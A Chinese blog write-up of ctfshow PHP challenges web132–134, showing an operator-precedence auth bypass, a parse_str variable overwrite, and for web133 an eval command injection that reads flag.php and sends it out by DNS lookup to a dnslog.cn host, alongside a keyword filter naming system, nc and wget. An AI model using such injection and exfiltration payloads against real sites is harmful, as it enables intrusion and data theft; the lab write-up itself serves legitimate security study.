news 2026/4/24 6:21:02

ctfshow 132,133,134(php特性)

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
ctfshow 132,133,134(php特性)

web132

打开指挥是个blog网站,我们用dirsearh扫描一下目录

访问/admin/index.php

查看源码

<?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['username']) && isset($_GET['password']) && isset($_GET['code'])){ $username = (String)$_GET['username']; $password = (String)$_GET['password']; $code = (String)$_GET['code']; if($code === mt_rand(1,0x36D) && $password === $flag || $username ==="admin"){ if($code == 'admin'){ echo $flag; } } }

&&需要两边同事都要满足,而||只需要两边任意一个满足就行了。

我们满足username="admin" 然后内层if还要求code='admin' 还要带上password 因为必须有

?code=admin&username=admin&password=

web133

源码

<?php error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']){ if(!preg_match('/system|nc|wget|exec|passthru|netcat/i', $F)){ eval(substr($F,0,6)); }else{ die("6个字母都还不够呀?!"); } }

源码中只对前六个字符作为php代码执行,,因为这个题无显然后这道题用到了数据外带。

需要用到dnslog.cn获取

?F=`$F`; ping `cat flag.php | grep ctfshow | tr -cd "[a-z]"/"[0-9]"`.vlyye3.dnslog.cn -c 1

tr -cd就是只保留指定字符

-c 1就是ping1一次

截取出来的用8 4 4 4 12分开,并且手动添加- 因为这里我们只要求返回0-9和a-z的。

web134

<?php highlight_file(__FILE__); $key1 = 0; $key2 = 0; if(isset($_GET['key1']) || isset($_GET['key2']) || isset($_POST['key1']) || isset($_POST['key2'])) { die("nonononono"); } @parse_str($_SERVER['QUERY_STRING']); extract($_POST); if($key1 == '36d' && $key2 == '36d') { die(file_get_contents('flag.php')); }

@parse_str($_SERVER['QUERY_STRING'])这一行

$_SERVER['QUERY_STRING']的意思就是读取?后的。

parse_str,将字符串解析成多个变量

例如?a=123&b=456

就变成$a=123 $b=456

而传入的里面又不能只有key1,key2

?_POST[key1]=36d&_POST[key2]=36d

让他给咱前面添加一个。然后看源代码拉到底部。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/23 16:03:22

韩国娱乐公司用Sonic复活已故明星举办AI演唱会

韩国娱乐公司用Sonic复活已故明星举办AI演唱会&#xff1a;基于轻量级数字人口型同步模型的技术解析 最近&#xff0c;一则关于“韩国娱乐公司利用AI技术让已故歌手登台献唱”的消息在社交媒体上引发热议。舞台上光影流转&#xff0c;熟悉的面容、精准的口型、带着情感起伏的歌…

作者头像 李华
网站建设 2026/4/23 11:34:10

马来西亚华人社群使用Sonic传承中华方言文化

马来西亚华人社群使用Sonic传承中华方言文化 在吉隆坡的一间老式排屋客厅里&#xff0c;82岁的陈阿嬷正对着手机录音&#xff1a;“我细个时啊&#xff0c;在槟城街边食蚝煎……”她的闽南语带着浓重的乡土腔调。这段声音随后被上传到一个简单的网页平台&#xff0c;搭配一张泛…

作者头像 李华
网站建设 2026/4/23 12:52:58

CNKI中国知网收录Sonic团队发表的核心期刊文章

轻量级数字人口型同步模型技术解析&#xff1a;Sonic如何重塑AIGC内容生产范式 在虚拟主播一夜爆红、AI教师走进在线课堂的今天&#xff0c;一个看似简单却长期困扰行业的问题浮出水面&#xff1a;我们能否让一张静态照片“开口说话”&#xff0c;而且说得自然、对得上音&#…

作者头像 李华
网站建设 2026/4/23 12:58:31

一文说清单通道ADC在CubeMX中的配置要点

从零开始掌握STM32单通道ADC&#xff1a;CubeMX配置全解析在嵌入式开发中&#xff0c;传感器无处不在——温度、光照、电压、电流……而这些物理量最终都要通过模数转换器&#xff08;ADC&#xff09;进入数字世界。对于大多数只采集一个信号的项目来说&#xff0c;单通道ADC是…

作者头像 李华
网站建设 2026/4/23 12:48:23

Sonic模型安全防护:防止恶意上传与DDoS攻击

Sonic模型安全防护&#xff1a;防止恶意上传与DDoS攻击 在虚拟主播、在线教育和短视频创作日益普及的今天&#xff0c;数字人生成技术正以前所未有的速度渗透进各类应用场景。腾讯联合浙江大学推出的Sonic模型&#xff0c;凭借其轻量级架构与高精度唇形同步能力&#xff0c;成为…

作者头像 李华
网站建设 2026/4/23 16:04:55

Matlab 基于形态学的权重自适应图像去噪探索

matlab基于形态学的权重自适应图像去噪 图像去噪是指减少数字图像中噪声的过程。 现实中的数字图像在数字化和传输过程中常受到成像设备与外部环境噪声干扰等影响&#xff0c;称为含噪图像或噪声图像。 去噪是图像处理研究中的一个重点内容。 在图像的获取、传输、发送、接收、…

作者头像 李华